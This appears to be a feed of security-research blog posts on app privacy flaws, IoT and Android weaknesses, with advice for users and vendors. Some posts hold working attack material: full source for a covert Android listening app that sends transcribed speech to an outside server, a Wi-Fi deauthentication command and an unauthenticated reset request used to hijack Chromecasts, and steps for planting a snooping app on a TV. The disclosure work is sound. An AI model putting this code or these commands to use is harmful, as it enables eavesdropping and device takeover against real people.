We reported the security flaw to Runtastic privately in early 2015. The finding wasn’t acknowledged and we received a very generic response about privacy settings.
As the issue wasn’t fixed at the time, we decided not to publish, so as not to expose lone runners to stalking attacks.

The bug was quietly fixed in late 2015, though we were not notified and only realised when the technique no longer worked. Hence we have now published. We have logs, photographic and video evidence to prove it.

What should you do as a runner?

  • Do you really need to share your workouts? If not, don’t.
  • Don’t start tracking your workouts from your front door.
  • Make sure you check your privacy settings, both on the app in question, but also on any social media you are using to share workouts.
  • Don’t make your routine predictable, vary your times and routes.
  • If you must share your workouts, ensure you only share with people you know and trust. Do not make this information public.
  • Don’t share your workouts live. You don’t want to advertise your whereabouts.
  • Try to avoid running alone where possible, but if unavoidable let someone you trust know your route and how long you expect to be.

What you should you do as an app manufacturer

  • Enforce strong passwords
  • Construct website URLs in such a way that they can’t be enumerated
  • Set default privacy settings as “locked down”
  • Clearly show your users how to unlock those settings
  • Prevent search engine spidering of session pages with a simple robots.txt command
  • Discuss personal safety in your messaging
  • Promote the above as another set of reasons why your app is better than the others

Why I think that U.S. house is hounded by phone trackers

$
0
0

After the BBC contacted us for comment on this story I thought it’d be useful and interesting to share the details that were omitted, as well as the reasoning behind some of my assumptions (none of which involve the Bermuda triangle BTW).

The consensus here on the original fusion.net article was that this is probably down to a single non-GPS location service such as WiFi fingerprinting or cell tower triangulation, that is placing these stolen phones in this location.

I tend to agree that this is the most likely explanation too, as Wi-Fi is the prime contender due to it being cross-device and mobile carrier independent.

So, what is likely to be going on here?

My theory, based on the very limited information available is this (assuming all of these people looking for their phone have had them stolen, or lost in the same, or similar location):

  1. Some little toerag is stealing peoples’ phones and taking them to the same location.
  2. That location has almost zero cell tower coverage- which is likely if this is a rural location.
  3. The location also has at least one broadcasting Wi-Fi device with a MAC/SSID that was previously installed or used at the location being identified by the phones as their location.
  4. The phones cannot get a GPS fix, and cannot triangulate due to lack of cell towers, so they fall back to using Wi-Fi location as it is the most accurate method it has available.
  5. When it does manage to get a cell tower connection it manages to upload this location to the servers.

Here’s the reasoning behind some of my assumptions

1. If people are turning up at your house looking for their phone, they live within a reasonable distance. This suggests that this is not people from all over the country/world being told that their phone is at your house. Also, If the police are willing to believe that the phone may be located in your house, as they seem to have at least once from the article, then the ‘victims’ are also probably reasonably local. At least to a state level I would guess. I think this helps point towards a local thief, either of opportunity or specifically targeting cell phones.

2. If the Atlanta is the one in Idaho, rather than Georgia, then there are some very rural and hard to access places In that state, giving credence to the argument that cell tower triangulation would not be reliable. And that if the phones are kept indoors that GPS would also not be producing fixes that the phone is willing to use over a strong Wi-Fi signal.

3. The moved/stolen/reused Wi-Fi router is something that just best fits the facts available. Other explanations would be a Wi-Fi device near the phones actual location that has been uploaded to one of these location databases with bad location data.

4. I have actually seen a person’s location data hop around a map where a router has been relocated due to a house move, and before the databases of the routers location have had chance to be updated.

5. It’s also possible that someone who steals phones might have stolen or reused a Wi-Fi router that may previously have been used at this address, and the StreetView van hasn’t driven past their Unabomber style mountain shack to correct the router’s location yet.

What can be done?

There is a lot of speculation here, as I’m sure you’ve noticed. The people with the information at hand to solve this mystery are Google and Apple, as they would have enough information in their logs to clear this up fairly easily. When a location is sent to their services I would also imagine the method used to fix the location would also be logged. They would also have valuable location history data, which would also serve to track the phone from its point of loss to its final reported position.

Are your phones listening to you?

$
0
0

baddroidteeth

Ever had a weird situation where you’ve been talking about something, then shortly after an advert pops up on your phone or web browser relating to something you just said? There’s enough anecdotal evidence to suggest that it could be going on, but we wanted to prove how possible and easy it was.

If you haven’t already seen our film on the BBC web site about mobile apps and other devices listening to you, it’s here http://www.bbc.com/news/technology-35639549.

The BBC came to us as they wanted to investigate the potential. Dave had a think about it and decided the easiest way would be to code up a rogue Android app that had permissions to the microphone.

Do users actually check the permissions when they install an app? Fairly unlikely, hence it would be easy to get an app on to a users phone that could listen.

Facebook, Twitter, Instagram and many other popular mobile apps have the ‘record audio’ permission. We’re not saying that they use it, but mic access is widespread

We had some concerns about this though:

First, we suspected that battery use would be high when constantly listening to the mic and uploading the audio to a voice-to-text service. Actually, this turned out not to be the case

Second, we were interested in ‘positive reinforcement’ – people often focus on the unusual, so coincidental advert displays could be presented as evidence of ‘snooping’

Anyway, my colleague Dave wrote the app, we installed it on to our own phone, hooked up to a service to take voice to text for us and presented the results in real time on screen, for the purposes of filming.

Was it rocket science? No, anyone with a modicum of Android or iOS coding skills could have done this.

It was just about proving a point; that it’s perfectly possible, that numerous mobile apps could snoop on your conversations if they wanted to.

A few more technical details that didn’t make the film

The media stream of the phone had to be muted, to avoid it making sounds whilst recording

Whilst we set keywords using the snooped voice text to try to generate custom adverts within the app, they didn’t actually work! We need to spend more time on this to get it fixed

There’s one point where we’re are all struggling to speak through suppressing laughter. The voice recognition is pretty good, but not perfect. We were in pieces because Zoe (the BBC reporter) was recorded as saying this:

www.hackXXitup.com-access_log-20160228:x.x.x.x – – [23/Feb/2016:15:05:41 +0100] “GET /recorded/wheat+allergy+to+come+up+with+a+wet+dream HTTP/1.1″ 404 312

No, she didn’t actually say that!

Conclusion

We can’t be certain that any apps are actually snooping on your speech, but it’s perfectly possible.

Loads of apps already have the required permission, and users generally blindly accept the permissions anyway.

The next step would be figuring out a way to review large numbers of apps in the stores to see if any are actually taking your voice data.

Should you be concerned? I’m certainly not overly worried about it, but if you do see an advert that relates to something unusual that you just said, do let me know.

BLN’s IoT Forum. What went down

$
0
0

We had a great time at the BLN IoT Security Forum yesterday, there was a stunning turnout and the audience made it an absolute pleasure.

So many vulnerable gadgets, where to start?

BLNIoT4

Ah, the perennially broken kids tablet.

2

…and everyone’s favourite, the not-so-smart kettle.

BLNIoT3

New Chromecast & Chromecast Audio. Have they fixed their hijacking issue?

$
0
0

Written in partnership with Minh-dat Lam.

Back in 2013 the first ever Chromecast was released and shortly after in 2014 the first Chromecast was successfully hacked.

This vulnerability was discovered by Bishop Fox and was titled “The Rickmote Controller: Hacking One Chromecast at a Time” http://www.bishopfox.com/blog/2014/07/rickmote-controller-hacking-one-chromecast-time/.
We wanted to see if Google has addressed this security concern 2 years later in their new 2015 Chromecast and Chromecast Audio devices.

Chromecast Out The Box

Initially the Chromecast comes out the box with an open WiFi connection for pairing:
chromecast1
No change there!

We thought we’d have a look at what services were available on the Chromecast:

Nmap scan report for 192.168.255.249 (Default Chromecast AP Address)
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
8008/tcp open http
8009/tcp open ssl/ajp13?
Supported Server Cipher(s):
Accepted TLSv1 256 bits AES256-SHA
Accepted TLSv1 128 bits AES128-SHA
Accepted TLSv1 168 bits DES-CBC3-SHA
Accepted TLSv1 128 bits RC4-SHA
Accepted TLSv1 128 bits RC4-MD5
8873/tcp open dxspider?
8879/tcp open unknown (Online Source Code: https://android.googlesource.com/platform/system/bt/+/4cac544/btcore/src/counter.c)

We spotted comments in the online source code such as “Disable opening network debug ports for security reasons” which appears to relate to a debug service:

>nc -vvn 192.168.255.249 8879
(UNKNOWN) [192.168.255.249] 8879 (?) open
Welcome to counters
> help
help command unimplemented
> show
counter count registered:0

Google source code also mentions:
“By default, we open up to three TCP ports that are used for debugging purpose:

  • TCP port 8872 – used for forwarding btsnoop logs at real time (Note: the port is open only if “Bluetooth HCI snoop log” is enabled in the Developer options)
  • TCP port 8873 – used for HCI debugging
  • TCP port 8879 – used for debugging the Bluetooth counters”

Shouldn’t these be disabled for security reasons?

Chromecast Pairing process

Although there was an SSL service, the Chromecast appeared to function over clear text:

chromecast2

Since the pairing all happens over the default open WiFi network on the Chromecast, we thought we could just intercept the WiFi key during the pairing process?

chromecast3

Not the case! The client uses the public key to encrypt the WiFi password which is then sent over the open WiFi.

chromecast4

Attacking the Chromecast again

After our initial review, we thought we would check the original vulnerability against the new versions released 2 years later.

The attack works by preventing a Chromecast from communicating with the internet. This can be performed through a disassociation attack (or any other way to prevent internet access to the Chromecast). When no internet connection is detected, the Chromecast starts a new open WiFi Access Point that allows unauthenticated configuration.

We initially started a scan using tools such as Airmon-ng for MAC addresses that belong to Google Devices:

a4:77:33

or

fa:8f:ca

We then scanned for the MAC address of the Access Point that the Chromecast was connected to, and launched a disassociation attack:

aireplay-ng -0 1000 -a -c wlan0

Now we just need to scan for the Chromecast’s new open Access Point. It would appear that Google has still not fixed this issue.

We can then connect to the Chromecast’s AP in setup mode and reconfigure the Chromecast with a set of POST requests we’ve captured or manually using the app.

We also noticed that it was possible to factory reset the device via an unauthenticated POST request. This could be sent from either the network that the Chromecast was connected to, or the setup WiFi network:

POST /setup/reboot HTTP/1.1
Origin: https://www.google.com
Content-Length: 16
Content-Type: application/json
Host: 192.168.255.249:8008
Connection: Keep-Alive
User-Agent: com.google.android.apps.chromecast.app/1.12.32 (Linux; U; Android 4.4.4; Nexus 4 Build/KTU84P)
{“params”:”fdr”}

Although we saw requests with a device ID, this was not required as a layer of authentication to factory reset the device.

POST 192.168.2.147:8008/setup/get_app_device_id
~~~CUT~~~
{“app_id”:”E8C28D3C”}

Now what?

With access to the setup network, or the device in a factory-reset state, it would be possible to connect the Chromecast to the attacker’s network, and stream arbitrary content to the user’s screen. Anywhere that the Chromecast’s WiFi network extends to is vulnerable to this attack. It would be trivial to play content on your neighbours Chromecast within minutes. One notable feature of the Chromecast is the ability to switch on a television when content starts playing. This makes this attack particularly effective.

Conclusion

We understand that the Chromecasts reverts back to a “Setup” mode when it cannot detect a network, which is designed for transportability, however, we don’t understand why there is no “reset” or “sync” style button on the devices that would safely revert the devices back to a “Setup” mode instead. The device already has a button that could be used for this feature.

Surely this is a simple fix to prevent the de-authentication style hijacking attacks?

Apps and Après. Skiing and privacy

$
0
0

Co-written with Chris Pritchard.

ski-app-privacy.fw

We were recently researching a job lot of ski and snow sport related hardware and software and discovered one app (of the many we reviewed) that gave us cause for concern.

In this particular case the vendor was helpful. There was no need to disclose it publicly as they had applied a fix within 48 hours of us contacting them.

However, there are useful lessons for everyone from our research, so here’s the anonymised version of our findings.

What we found

The apps main function was as a route tracker, so we were in familiar territory already.

Those oh-so common issues. As with many, many apps this one suffered from the usual glut of basic flaws:

  • The email used to sign up wasn’t verified anywhere, so you could use anyone’s address.
  • It allowed simple (read: easily crackable) passwords of 6 characters or more, so “password” or “123456” could be used for example.
  • It did use HTTPS BUT if you requested information in clear text the app provided it back in clear text too, so you could read sensitive info like an email address.
  • Although the application supported SSL it did not validate the server identity, leaving it vulnerable to MitM attacks. For this attack to be successful the attacker would need to be geographically close (i.e. in Wi-Fi range).

Now for some interesting issues

The app also had a group tracking functionality, so that users within a defined group of ski friends could see where the others were in real time with a map display. Pretty cool, easy to find out where your friends are without expensive ‘which piste are you on’ phone calls whilst roaming.

Wrong (you knew that was coming). When you create a group for your friends to join you can call it whatever you like, however, when adding friends to your group, the group creator passes them a unique 5 digit reference generated by the app. Uh oh…

The 5 digit group ID is generated server side. 100,000 combinations doesn’t sound like a lot of entropy, does it. Likely enough to cater for lots of skiing groups, but not enough to defend against a brute force or enumeration attack to discover valid group IDs

Once you’ve got a valid group ID, submit it in a POST request to the API and you can get information about the members of that group.

Worse, we found that with that POST request you could get every group member’s long/lat location information, in real time. You could also see when they’d created their account as well as when they’d joined the group. Their email address was disclosed too. Also, if they’d signed in with their Facebook account it returned their public Facebook ID so you could find their public Facebook page.

The icing on the cake was the apps persistence. If you didn’t explicitly close the app down it would keep running in the background, long after you’d left the slopes. Maybe so long after that it’d give your location away days/weeks after you’d got back from holiday.

Here are some screenshots of us tracking ourselves unauthenticated using the above bug… on the way from the ski slopes to the pub in Meribel!

ski-app-privacy-map

Lessons that need to be learned

  • Use email address validation.
  • Where IDs need to be generated do so in a mathematically complex way. Simple sequential numbers can be easily guessed.
  • Implement certificate pinning.
  • Make it clear to users that the app continues to function unless explicitly closed down.
  • Developers should be careful about the information they send back to anonymous requests. E.g. sending back email addresses and Facebook IDs. This could be a violation of the Data Protection Act.
  • Use secure session management within your application. Ensure that only authorised users can make requests for specific groups.

How we made the listening-in Android app

$
0
0

DIYbaddroidteethYou may have seen us on the BBC recently, showing how a mobile device can be used to snoop on you. I created an Android app to surreptitiously listen-in to conversations near the device and send them to an offsite server as pure text.

We’ve had a few questions asking how we put the app together, so here’s an explanation so that you can do it yourself.

CAVEAT: We were under significant time pressure to get the app ready for a filming date, so it’s very hacked together. It’s no perfect app!

How it works

I went for a quick mock up – to prove that it was possible to actually write an app that would listen-in. I took some things for granted:

  1. The user would accept any requested permissions, because as shown by Facebook, they do if they think the content is worth it.
  2. The app can work in the foreground. It is possible to get this to work in the background but I was running out of time. This isn’t too much of a stretch; lots of people have apps that run constantly in the foreground (e.g. a recipe app in the kitchen).

The basic flow of the app is for the app to initialise, display a screen, then I would initialise an instance of Android’s SpeechRecogniser’s class and whenever I got a result send it off site.

Doesn’t sound too difficult does it?

So, I loaded up Android Studio and created the app: ptp.unacceptablebehaviour. Although most of the tests just had a simple text bar, for the final version we had one of our guys whip up a killer graphic:

ListenApp1

So, once it starts, it displays the image. Then it sets up a Google SpeechRecognizer object:

speech = SpeechRecognizer.createSpeechRecognizer(this);
speech.setRecognitionListener(this);
restartSR();private void restartSR() {
recognizerIntent = new Intent(RecognizerIntent.ACTION_RECOGNIZE_SPEECH);
recognizerIntent.putExtra(RecognizerIntent.EXTRA_LANGUAGE_PREFERENCE,
“en”);
recognizerIntent.putExtra(RecognizerIntent.EXTRA_CALLING_PACKAGE,
this.getPackageName());
recognizerIntent.putExtra(RecognizerIntent.EXTRA_LANGUAGE_MODEL,
RecognizerIntent.LANGUAGE_MODEL_WEB_SEARCH);
recognizerIntent.putExtra(RecognizerIntent.EXTRA_MAX_RESULTS, 3);
speech.startListening(recognizerIntent);
}

I put where it starts the thread in a separate method so I could easily restart the speech recognition when it finished.
The Google speech recognition class works by setting up a listener which will do all the hard work and then call back at various points in its life, these we hook into, mainly for logging purposes. The essential calls are:

  • onReadyForSpeech – the listener is set up and is actively checking the microphone
  • onBeginningOfSpeech – the listener has header something that sounds like speech and is recording it
  • onEndOfSpeech – the listener has noticed that the speech has stopped
  • onResults – called when the speech has been converted it to text
  • onError – something went wrong

There’s also an onPartialResults callback which is designed for when there the speech is going on for too long without a break. In testing this never got called.

In this case all I was really interesting in was onResults, where we have that text string of what the phone has heard. It’s here where we do our callback.

Again I took a lazy route for this. The quickest, easiest and dirtiest way of transferring a string to somewhere is to make it into a web call and record it in the web log of a site that we control. It doesn’t matter whether that call is to a valid URL, as long as it hits the web log.

As HTTP calls are common in Android apps, I just used the standard Java HttpUrlConnection class:

public void onResults(Bundle results) {
Log.i(LOG_TAG, “onResults”);
ArrayList matches = results
.getStringArrayList(SpeechRecognizer.RESULTS_RECOGNITION);
for (String result : matches) {
try {
String desturl = “http://xxxxxxxx.com/recorded/” + URLEncoder.encode(result, “UTF-8”);
Log.i(LOG_TAG, “Sending to ” + desturl);
URL url = new URL(desturl);
HttpURLConnection connect = (HttpURLConnection) url.openConnection();
connect.connect();
InputStream in = new BufferedInputStream(connect.getInputStream());
in.read();
connect.disconnect();
}
catch (MalformedURLException e) {
Log.i(LOG_TAG, “Malformed URL”);
}
catch (IOException e) {
Log.i(LOG_TAG, “IO Exception”);
}
catch(Exception e) {
Log.i(LOG_TAG, “Exception Type ” + e.getMessage());
}}
restartSR();
}

So, if the speech recogniser picks up the phrase “unacceptable behaviour” it will convert this to:

http://xxxxxxxx.com/recorded/unacceptable+behaviour

The domain name has been redacted, not because I want to keep it secret, I was just running out of domain names to use, so this one had a swearword in it!

Here’s the device’s logfile:

03-22 12:11:28.634 21033-21033/ptp.unacceptablebehaviour I/MainActivity: onReadyForSpeech
03-22 12:11:29.930 21033-21033/ptp.unacceptablebehaviour I/MainActivity: onBeginningOfSpeech
03-22 12:11:33.636 21033-21033/ptp.unacceptablebehaviour I/MainActivity: onEndOfSpeech
03-22 12:11:33.636 21033-21033/ptp.unacceptablebehaviour I/MainActivity: Here
03-22 12:11:34.711 21033-21033/ptp.unacceptablebehaviour I/MainActivity: onResults
03-22 12:11:34.719 21033-21033/ptp.unacceptablebehaviour I/MainActivity: Sending to http://xxxxxxxx.com/recorded/unacceptable+behaviour
03-22 12:11:34.837 21033-21033/ptp.unacceptablebehaviour I/MainActivity: IO Exception
03-22 12:11:34.837 21033-21033/ptp.unacceptablebehaviour I/MainActivity: Sending to http://xxxxxxxx.com/recorded/an+acceptable+behaviour
03-22 12:11:34.885 21033-21033/ptp.unacceptablebehaviour I/MainActivity: IO Exception
03-22 12:11:34.885 21033-21033/ptp.unacceptablebehaviour I/MainActivity: Sending to http://xxxxxxxx.com/recorded/unacceptable+behaviours
03-22 12:11:34.937 21033-21033/ptp.unacceptablebehaviour I/MainActivity: IO Exception
03-22 12:11:34.937 21033-21033/ptp.unacceptablebehaviour I/MainActivity: Sending to http://xxxxxxxx.com/recorded/and+acceptable+behaviour
03-22 12:11:34.988 21033-21033/ptp.unacceptablebehaviour I/MainActivity: IO Exception
03-22 12:11:34.989 21033-21033/ptp.unacceptablebehaviour I/MainActivity: Sending to http://xxxxxxxx.com/recorded/acceptable+behaviour
03-22 12:11:35.029 21033-21033/ptp.unacceptablebehaviour I/MainActivity: IO Exception

And then we can see the log on our webserver:

ListenApp2

Yeah, it’s clunky, but it works!

Some Problems

It’s not perfect and we found some problems whilst writing it which are explained below.

Permissions

The app needed quite a few permissions and these may be enough to cause some warning flags. The permissions I gave it in the end were:

  • MODIFY_AUDIO_SETTINGS – to allow the app to alter the volume – this is explained below
  • INTERNET – For SpeechRecognizer and to log the results
  • ACCESS_NETWORK_STATE – For SpeechRecognizer
  • RECORD_AUDIO – For SpeechRecognizer

In a later version I also stopped the screen going to sleep to make it easier to run in the demo.

These actually caused me more problems than first thought – my test Android device is a Nexus 5 running Android 6 (Marshmallow). Marshmallow was the first version of Android to officially allow the user to over-ride app permissions, which caused me to repeatedly wonder why I was getting a “permission denied” message when it was just that I had refused the permission!

Audio Cues

Google’s SpeechRecognizer uses two audio cues, one of onReadyForSpeech and the other onEndOfSpeech. These cues cannot be over-ridden or change. All I could do was to mute the media audio stream that they are played on:

AudioManager am=(AudioManager)getBaseContext().getSystemService(getApplicationContext().AUDIO_SERVICE);
am.setStreamVolume(AudioManager.STREAM_MUSIC, AudioManager.ADJUST_MUTE, 0);

On Marshmallow and Lollipop this is the Music stream, on earlier versions of Android it is the System stream.
Obviously as I’m messing with the system settings this ruins the stealthiness of it. Using an alternative speech to text service could make this easier.

Battery Life

There will be an impact on battery life, although in testing the largest drain was the screen (as I was keeping the screen on full time) so this needs to be assessed with a proper background service.

Lock Screen

The lock screen would stop it listening whilst the phone is locked – it is possible to get around this using the Android concept of day dreams. This would require extra permissions and testing.

Serving Adverts

The last bit of the test was to see whether we could create custom adverts based on what it heard. So I plugged in Google’s AdView, and there I found the problem. AdView allows keywords to be added to ad requests but it doesn’t actually use them to serve adverts.

See, I even had the code to do it:

AdView adview = (AdView) findViewById(R.id.adView);
AdRequest adrequest = new AdRequest.Builder().addKeyword(matches.get(0)).build();
adview.loadAd(adrequest);

Back to the drawing board on this, or to use a different advertising provider.

Conclusions

It’s easy enough to write an app that can listen in to you and convert what you say to speech, even with just half a day of gluing random bits of code together.

There are some hurdles that need to be worked through to make this totally stealthy and to get the ad networks to respond.
It looks like Google’s taken the right steps with its SpeechRecognizer and AdView APIs.

Finally the best defence is to allow user control over user permissions, something that should have been in Android a long time ago. The facility was in the OS as far back as Jelly Bean, but removed from Kit Kat and Lollipop. Google really dropped the ball with this and we should question why it took so long for such an effective defence to be implemented.

Another (un)smart Smarter app

$
0
0

unsmartYou might remember we looked at the hardware of the Smarter WiFi Coffee machine and found you could command it without adding it to your network and using the app. Accompanying the device was a new app – the Smarter app. This is a single app that covers both the iKettle 2.0 and the Coffee Machine.

I thought I would take a look at the app to see how it worked and if we could find any more juicy vulnerabilities like we found in the original WiFi kettle app.

Looking at the code of the Android version of the app, the first thing I notice is that it is a relatively small with only a few classes used:

unsmart1

The main bulk of the app is in the smarter classes.

unsmart2

Taking a quick look at the containers I was immediately interested in the async container as I wondered what might be leaving the app and it contained a couple of classes to do with home network scanning.

unsmart3

A quick glance as the 4 classes and the SendEmailBytes.class and SendEmailFile.class immediately caught my eye:

public static final String SENDGRID_PASSWORD = “****************************** “;
public static final String SENDGRID_USERNAME = “************ “;
private Context context;

Hang on a sec, isn’t that a username and password stored in clear text in the application!  – I’ve obfuscated them for this post.

Didn’t I see a SendGrid container, complete with SendGrid Class.

unsmart4

SendGrid is an SMTP email service used within applications for sending email. It has an API which can be used to send the email. The API can be configured to be quite restricted in what it can do. In this case it seems Smarter didn’t do this, they just opted to include their full SendGrid username and password.

This would allow anyone to view their account stats and who they have sent email to.

The latest version 3.1.0 from 15 March 2016 fixes this bug

Rather oddly, we looked at an earlier version of 3.1.0 which had the bug, but it has been updated on the Play Store without incrementing the version number.

Hence, you should uninstall and reinstall the app. Even if your phone states it has 3.1.0 installed, you need to reinstall from the Store!

Avoiding the issue

Remove the static credentials. Smarter really should look at using the API in the right way for this app. The SendGrid service does allow very granular control over what the API can do which will limit the exposure, BUT if an application user can get hold of the API key and they will be able to do whatever the app can – in this case send email. Given that the key will be embedded in the application, essentially anyone who wants to would be able to do this

Secondly, and we have said this time and time again, implement some form of code obfuscation to prevent reverse engineering. It’s not going to fix the underlying issue, but it will make it harder for your API key to be accessed.

It could still be possible to obtain it by performing a man-in-the-middle attack against the app if it doesn’t support SSL Certificate Pinning and so thirdly, implement certificate pinning.

Those 3 key issues will massively reduce the risk of an attacker exploiting this or any app.

 

How-to subvert Android backups to export sandboxed app files

$
0
0

appback

During Android security reviews one of the most annoying and troublesome things I come across is getting the data onto my assessment machine for thorough analysis. It’s the copying of sandboxed application files that’s a real bugbear.

In an effort to reduce my pain I use the following method.

App sandboxing 101

As a little refresher, every installed application on Android is given a directory in which to store its internal files. This directory is restricted by file permissions so it is only accessible by the application and the root user. This is known as the application’s sandbox.

The sandbox is stored under /data/data/appname. Where “appname” is the fully qualified application name that it is built with.

Here’s an example from a device running Marshmallow:

root@hammerhead:/data/data # cd ptp.unacceptablebehaviour
root@hammerhead:/data/data/ptp.unacceptablebehaviour # ls -l
drwxrwx–x u0_a105  u0_a105           2016-03-22 11:37 app_webview
drwxrwx–x u0_a105  u0_a105           2016-03-22 12:11 cache
drwxrwx–x u0_a105  u0_a105           2016-03-22 12:11 code_cache
drwxrwx–x u0_a105  u0_a105           2016-03-22 12:11 shared_prefs

In Android every app is given a unique user (in this case u0_a105) and group. With Unix file permissions the only users that can access the sandbox are:

  • root
  • u0_a105
  • Members of the u0_a105 group

So, how can I get the files I want back to my assessment laptop for analysis if I’m not any of the above? This is where backup comes in.

The allowBackup parameter

The app manages backups through the android:allowBackup parameter of the <application> tag in the AndroidManifest.xml. The default setting allows backups.

Backups are useful as you don’t need to be root to do a backup. ​This means that you can extract cleartext secrets directly from an app’s sandbox without rooting your device, all you need is adb and access to the device.

To make a backup, you can use the adb backup command (the -d is just to specify the physical device):

C:\Users\dave\Desktop>adb -d backup com.ptp.unacceptablebehaviour

Now unlock your device and confirm the backup operation.

You will then have to unlock your phone and confirm for the backup to go ahead.

appback1

By default it will save a file called backup.ab in the directory adb was run from. The format is a slightly modified tar file with a 24 byte header:

ANDROID BACKUP
3
1
none

​Where line 1 is the magic string (i.e. it identifies the file type), line 2 is the version number, line 3 is a compression flag (1 is compressed) and line 4 is the encryption algorithm. In the case where it is encrypted there are extra fields, but we don’t need that.

Extracting that data

After these fields is the data in .tar format. If the file is compressed we need to decompress it. I do this through python as I’m lazy (I really need to script this). This is all for a compressed and unencrypted file:

>>> import zlib
>>> with open(“backup.ab”,”rb”) as f:
…  data=f.read()…
>>> zipped=data[24:]
>>> raw=zlib.decompress(zipped)
>>> with open(“backup.tar”,”wb”) as o:
…  o.write(raw)
…​
>>> exit()

This should remove the header and write it decompressed to backup.tar which you can then open up in your favourite tar file reader, such as 7-zip:

appback2

If you don’t fancy rolling your own reader in python then you can use the android-backup-extractor (https://github.com/nelenkov/android-backup-extractor) utility to do this for you:

c:\users\dave\desktop> java –jar abe.jar unpack backup.ab backup.tar

Snooping Sony Bravia TV

$
0
0

androidsony
You’ll no doubt have seen the snooping Samsung TV we investigated last year.

…and the snooping Android mobile app we wrote for the BBC a couple of months back.

Since then we’ve been trying to combine the two attacks and get an Android-based TV to snoop on your audio.

Today we succeeded in getting our rogue android app to work on a Sony Bravia telly.

How-to

First, enable ‘install apps from unknown sources’.

That’s in Android settings, personal, security & restrictions.

Grab ES File Explorer and install from a USB key.

Then install your rogue app.

OR – just put your rogue app in the Play store. Far easier!

The video shows the TV listening to the microphone input, then sending the audio to Google’s voice service (Nuance), converting it to text then delivering to an external laptop.

The laptop could be anywhere with an internet connection. We’ve just put it next to the telly so that we can get it all in one simple video.

You could use a mobile phone or tablet to receive the data instead.

Issues

The TV doesn’t have a microphone built in, so we had to plug in a USB mike.

Ours is a Bravia 55X8005C, no doubt the higher end models come with microphones built in.

It runs quite an old version of Lollipop (5.0.2).

Consequences

Convince your victim to install a rogue app from the Play store or install it on their TV when they’re not looking.

Then everything said in earshot of the TV can be sent to a 3rd party.

I guess the most practical use of this is to snoop on people that you know. What an unpleasant thought!

Argos MyTablet FUBAR

$
0
0

pinktab

Some time ago, we noticed that Argos was selling a cheap tablet – the Bush MyTablet. It didn’t get great reviews, but our attention was drawn to it because

1. It was clearly running Android
2. It used the RK3188 CPU
3. It was Pink

 

 

A quick poke around the Android settings showed it was running KitKat 4.4.4. This was a long time ago, but even then Lollipop was current. Fail.

bushsettings

It supported encryption, unlike the Tesco Hudl 1, but we found we could crack a 4 digit PIN in under an hour… on a laptop, let alone a cracking rig!

Extracting the data

Key was getting in to the vulnerable Rockchip flash mode. Not as easy as the Hudl.

First, we took the back off, removed the EM shield from the CPU which acted as a heatsink. It quickly overheated and hard rebooted giving us the bootloader and flash mode.

We could also cheat and enable ADB locally, but that of course required the PIN first.

Finally, after about an hour of fiddling, we discovered that one simply holds vol up and vol down and power on. Flash mode fun!

bush1

Crack the PIN

Extract key and the salt from the metadata partition and the userdata partition header, then brute it:

bush3

Pwned!

We disclosed this to Home Retail Group in December 2014. At their request we waited some considerable time in order to avoid jeopardising a key sales period for them.

We didn’t get that much joy during the disclosure process, then frankly got bored of cheap Android tablets and moved on to IoT.

Rummaging through a box of old tablets today, we found the shiny pink Bush, so thought we may as well publish.

The Bush isn’t sold any more, though you can likely find them on eBay for giggles.

 

Viewing all 21 articles
Browse latest View live